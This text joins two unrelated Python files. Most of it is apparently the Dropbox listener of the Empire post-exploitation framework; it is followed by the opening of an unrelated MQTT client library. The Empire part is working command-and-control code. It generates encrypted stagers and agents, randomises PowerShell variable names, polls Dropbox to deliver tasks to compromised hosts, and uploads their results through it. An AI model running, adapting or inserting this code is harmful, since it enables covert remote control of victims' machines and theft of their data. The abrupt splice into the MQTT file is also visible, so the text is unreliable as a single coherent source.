if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/dbx generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
#path in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
#strip out comments and blank lines
code = helpers.strip_python_comments(code)
#patch some more
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print helpers.color("[!] listeners/dbx generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:APIToken = "%s";
""" % (apiToken)
getTask = """
$script:GetTask = {
try {
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent", $script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$TaskingsFolder = "%s"
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Authorization", "Bearer $($Script:APIToken)")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Dropbox-API-Arg", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}")
$Data = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData("https://content.dropboxapi.com/2/files/download")
if($Data -and ($Data.Length -ne 0)) {
# if there was a tasking data, remove it
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Content-Type", " application/json")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Remove("Dropbox-API-Arg")
$Null=$"""+helpers.generate_random_script_var_name("wc")+""".UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}")
$Data
}
$script:MissedCheckins = 0
}
catch {
if ($_ -match 'Unable to connect') {
$script:MissedCheckins += 1
}
}
}
""" % (taskingsFolder)
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$ResultsFolder = "%s"
try {
# check if the results file is still in the specified location, if so then
# download the file and append the new routing packet to it
try {
$Data = $Null
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Authorization", "Bearer $($Script:APIToken)");
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
$Data = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData("https://content.dropboxapi.com/2/files/download")
}
catch { }
if($Data -and $Data.Length -ne 0) {
$RoutingPacket = $Data + $RoutingPacket
}
$"""+helpers.generate_random_script_var_name("wc")+"""2 = New-Object System.Net.WebClient
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Authorization", "Bearer $($Script:APIToken)")
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Content-Type", "application/octet-stream")
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
$Null = $"""+helpers.generate_random_script_var_name("wc")+"""2.UploadData("https://content.dropboxapi.com/2/files/upload", "POST", $RoutingPacket)
$script:MissedCheckins = 0
}
catch {
if ($_ -match 'Unable to connect') {
$script:MissedCheckins += 1
}
}
}
}
""" % (resultsFolder)
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
def post_message(uri, data, headers):
req = urllib2.Request(uri)
headers['Authorization'] = "Bearer REPLACE_API_TOKEN"
for key, value in headers.iteritems():
req.add_header("%s"%(key),"%s"%(value))
if data:
req.add_data(data)
o=urllib2.build_opener()
o.add_handler(urllib2.ProxyHandler(urllib2.getproxies()))
urllib2.install_opener(o)
return urllib2.urlopen(req).read()
global missedCheckins
global headers
taskingsFolder="REPLACE_TASKSING_FOLDER"
resultsFolder="REPLACE_RESULTS_FOLDER"
data = None
requestUri=''
try:
del headers['Content-Type']
except:
pass
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
#check to see if there are any results already present
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
try:
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
except:
pkdata = None
if pkdata and len(pkdata) > 0:
data = pkdata + data
headers['Content-Type'] = "application/octet-stream"
requestUri = 'https://content.dropboxapi.com/2/files/upload'
else:
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
requestUri='https://content.dropboxapi.com/2/files/download'
try:
resultdata = post_message(requestUri, data, headers)
if (resultdata and len(resultdata) > 0) and requestUri.endswith('download'):
headers['Content-Type'] = "application/json"
del headers['Dropbox-API-Arg']
datastring="{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
nothing = post_message('https://api.dropboxapi.com/2/files/delete', datastring, headers)
return ('200', resultdata)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
sendMessage = sendMessage.replace('REPLACE_TASKSING_FOLDER', taskingsFolder)
sendMessage = sendMessage.replace('REPLACE_RESULTS_FOLDER', resultsFolder)
sendMessage = sendMessage.replace('REPLACE_API_TOKEN', apiToken)
return sendMessage
else:
print helpers.color('[!] listeners/dbx generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up polling server for Dropbox
polling communication.
./Empire/
./staging/
stager.ps1
SESSION_[1-4].txt
./taskings/
SESSIONID.txt
./results/
SESSIONID.txt
/Empire/staging/stager.ps1 -> RC4staging(stager.ps1) uploaded by server
/Empire/staging/sessionID_1.txt -> AESstaging(PublicKey) uploaded by client
/Empire/staging/sessionID_2.txt -> RSA(nonce+AESsession) uploaded by server
/Empire/staging/sessionID_3.txt -> AESsession(nonce+sysinfo) uploaded by client
/Empire/staging/sessionID_4.txt -> AESsession(agent.ps1) uploaded by server
client dropbox server
<- upload /Empire/staging/stager.ps1
read /Empire/staging/stager ->
<- return stager
generate sessionID
upload /Empire/staging/sessionID_1.txt ->
<- read /Empire/staging/sessionID_1.txt
<- upload /Empire/staging/sessionID_2.txt
read /Empire/staging/sessionID_2.txt ->
<- /Empire/staging/sessionID_2.txt
upload /Empire/staging/sessionID_3.txt ->
<- read /Empire/staging/sessionID_3.txt
<- upload /Empire/staging/sessionID_4.txt
read /Empire/staging/sessionID_4.txt ->
<- /Empire/staging/sessionID_4.txt
<start beaconing>
<- upload /Empire/taskings/sessionID.txt
read /Empire/taskings/sessionID.txt ->
<- /Empire/taskings/sessionID.txt
delete /Empire/taskings/sessionID.txt ->
execute code
upload /Empire/results/sessionID.txt ->
<- read /Empire/results/sessionID.txt
<- delete /Empire/results/sessionID.txt
"""
def download_file(dbx, path):
# helper to download a file at the given path
try:
md, res = dbx.files_download(path)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(path, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
return None
return res.content
def upload_file(dbx, path, data):
# helper to upload a file to the given path
try:
dbx.files_upload(data, path)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(path)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
def delete_file(dbx, path):
# helper to delete a file at the given path
try:
dbx.files_delete(path)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(path)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
listenerName = listenerOptions['Name']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
dbx = dropbox.Dropbox(apiToken)
# ensure that the access token supplied is valid
try:
dbx.users_get_current_account()
except dropbox.exceptions.AuthError as err:
print helpers.color("[!] ERROR: Invalid access token; try re-generating an access token from the app console on the web.")
return False
# setup the base folder structure we need
try:
dbx.files_create_folder(stagingFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(stagingFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(taskingsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(taskingsFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(resultsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(resultsFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# upload the stager.ps1 code
stagerCodeps = self.generate_stager(listenerOptions=listenerOptions, language='powershell')
stagerCodepy = self.generate_stager(listenerOptions=listenerOptions, language='python')
try:
# delete stager if it exists
delete_file(dbx, "%s/debugps" % (stagingFolder))
delete_file(dbx, "%s/debugpy" % (stagingFolder))
dbx.files_upload(stagerCodeps, "%s/debugps" % (stagingFolder))
dbx.files_upload(stagerCodepy, "%s/debugpy" % (stagingFolder))
except dropbox.exceptions.ApiError:
print helpers.color("[!] Error uploading stager to '%s/stager'" % (stagingFolder))
return
while True:
time.sleep(int(pollInterval))
# search for anything in /Empire/staging/*
for match in dbx.files_search(stagingFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
relName = fileName.split('/')[-1][:-4]
sessionID, stage = relName.split('_')
sessionID = sessionID.upper()
if '_' in relName:
if stage == '1':
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, stageData, listenerOptions)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
# TODO: more error checking
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
stageName = "%s/%s_2.txt" % (stagingFolder, sessionID)
listenerName = self.options['Name']['Value']
message = "[*] Uploading key negotiation part 2 to {} for {}".format(stageName, sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(results, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(stageName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
if stage == '3':
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, stageData, listenerOptions)
if dataResults and len(dataResults) > 0:
# print "dataResults:",dataResults
for (language, results) in dataResults:
if results.startswith('STAGE2'):
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} through Dropbox".format(sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
fileName2 = fileName.replace("%s_3.txt" % (sessionID), "%s_2.txt" % (sessionID))
dbx.files_delete(fileName2)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName2)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
returnResults = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
try:
stageName = "%s/%s_4.txt" % (stagingFolder, sessionID)
listenerName = self.options['Name']['Value']
message = "[*] Uploading key negotiation part 4 (agent) to {} for {}".format(stageName, sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(returnResults, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(stageName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# get any taskings applicable for agents linked to this listener
sessionIDs = self.mainMenu.agents.get_agents_for_listener(listenerName)
for sessionID in sessionIDs:
taskingData = self.mainMenu.agents.handle_agent_request(sessionID, 'powershell', stagingKey)
if taskingData:
try:
taskingFile = "%s/%s.txt" % (taskingsFolder, sessionID)
# if the tasking file still exists, download/append + upload again
existingData = None
try:
md, res = dbx.files_download(taskingFile)
existingData = res.content
except:
existingData = None
if existingData:
taskingData = taskingData + existingData
listenerName = self.options['Name']['Value']
message = "[*] Uploading agent tasks for {} to {}".format(sessionID, taskingFile)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(taskingData, taskingFile, mode=dropbox.files.WriteMode.overwrite)
except dropbox.exceptions.ApiError as e:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading agent tasks for {} to {} : {}".format(sessionID, taskingFile, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# check for any results returned
for match in dbx.files_search(resultsFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
sessionID = fileName.split('/')[-1][:-4]
listenerName = self.options['Name']['Value']
message = "[*] Downloading data for '{}' from {}".format(sessionID, fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error download data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
responseData = res.content
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
client.py
|
# Copyright (c) 2012-2014 Roger Light <roger@atchoo.org>
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# and Eclipse Distribution License v1.0 which accompany this distribution.
#
# The Eclipse Public License is available at
# http://www.eclipse.org/legal/epl-v10.html
# and the Eclipse Distribution License is available at
# http://www.eclipse.org/org/documents/edl-v10.php.
#
# Contributors:
# Roger Light - initial API and implementation
"""
This is an MQTT v3.1 client module. MQTT is a lightweight pub/sub messaging
protocol that is easy to implement and suitable for low powered devices.
"""
import errno
import platform
import random
import select
import socket
HAVE_SSL = True
try:
import ssl
cert_reqs = ssl.CERT_REQUIRED
tls_version = ssl.PROTOCOL_TLSv1
except:
HAVE_SSL = False
cert_reqs = None
tls_version = None
import struct
import sys
import threading
import time
HAVE_DNS = True
try:
import dns.resolver
except ImportError:
HAVE_DNS = False
if platform.system() == 'Windows':
EAGAIN = errno.WSAEWOULDBLOCK
else:
EAGAIN = errno.EAGAIN
# AWS WSS implementation
import AWSIoTPythonSDK.core.protocol.paho.securedWebsocket.securedWebsocketCore as wssCore
import AWSIoTPythonSDK.core.util.progressiveBackoffCore as backoffCore
import AWSIoTPythonSDK.core.util.offlinePublishQueue as offlinePublishQueue
VERSION_MAJOR=1
VERSION_MINOR=0
VERSION_REVISION=0
VERSION_NUMBER=(VERSION_MAJOR*1000000+VERSION_MINOR*1000+VERSION_REVISION)
MQTTv31 = 3
MQTTv311 = 4
if sys.version_info[0] < 3:
PROTOCOL_NAMEv31 = "MQIsdp"
PROTOCOL_NAMEv311 = "MQTT"
else:
PROTOCOL_NAMEv31 = b"MQIsdp"
PROTOCOL_NAMEv311 = b"MQTT"
PROTOCOL_VERSION = 3
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish= 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
# MessageQueueing DropBehavior
MSG_QUEUEING_DROP_OLDEST = 0
MSG_QUEUEING_DROP_NEWEST = 1
if sys.version_info[0] < 3:
sockpair_data = "0"
else:
sockpair_data = b"0"
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == 0:
return "Connection Accepted."
elif connack_code == 1:
return "Connection Refused: unacceptable protocol version."
elif connack_code == 2:
return "Connection Refused: identifier rejected."
elif connack_code == 3:
return "Connection Refused: broker unavailable."
elif connack_code == 4:
return "Connection Refused: bad user name or password."
elif connack_code == 5:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
result = True
multilevel_wildcard = False
slen = len(sub)
tlen = len(topic)
if slen > 0 and tlen > 0:
if (sub[0] == '$' and topic[0] != '$') or (topic[0] == '$' and sub[0] != '$'):
return False
spos = 0
tpos = 0
while spos < slen and tpos < tlen:
if sub[spos] == topic[tpos]:
if tpos == tlen-1:
# Check for e.g. foo matching foo/#
if spos == slen-3 and sub[spos+1] == '/' and sub[spos+2] == '#':
result = True
multilevel_wildcard = True
break
spos += 1
tpos += 1
if tpos == tlen and spos == slen-1 and sub[spos] == '+':
spos += 1
result = True
break
else:
if sub[spos] == '+':
spos += 1
while tpos < tlen and topic[tpos] != '/':
tpos += 1
if tpos == tlen and spos == slen:
result = True
break
elif sub[spos] == '#':
multilevel_wildcard = True
if spos+1 != slen:
result = False
break
else:
result = True
break
else:
result = False
break
if not multilevel_wildcard and (tpos < tlen or spos < slen):
result = False
return result
def _socketpair_compat():
"""TCP/IP socketpair including Windows support"""
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
listensock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensock.bind(("127.0.0.1", 0))
listensock.listen(1)
iface, port = listensock.getsockname()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
sock1.setblocking(0)
try:
sock1.connect(("127.0.0.1", port))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
sock2, address = listensock.accept()
sock2.setblocking(0)
listensock.close()
return (sock1, sock2)
class MQTTMessage:
""" This is a class that describes an incoming message. It is passed to the
on_message callback as the message parameter.
Members:
topic : String. topic that the message was published on.
payload : String/bytes the message payload.
qos : Integer. The message Quality of Service 0, 1 or 2.
retain : Boolean. If true, the message is a retained message and not fresh.
mid : Integer. The message id.
"""
def __init__(self):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = 0
self.topic = ""
self.payload = None
self.qos = 0
self.retain = False
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
General usage flow:
* Use connect()/connect_async() to connect to a broker
* Call loop() frequently to maintain network traffic flow with the broker
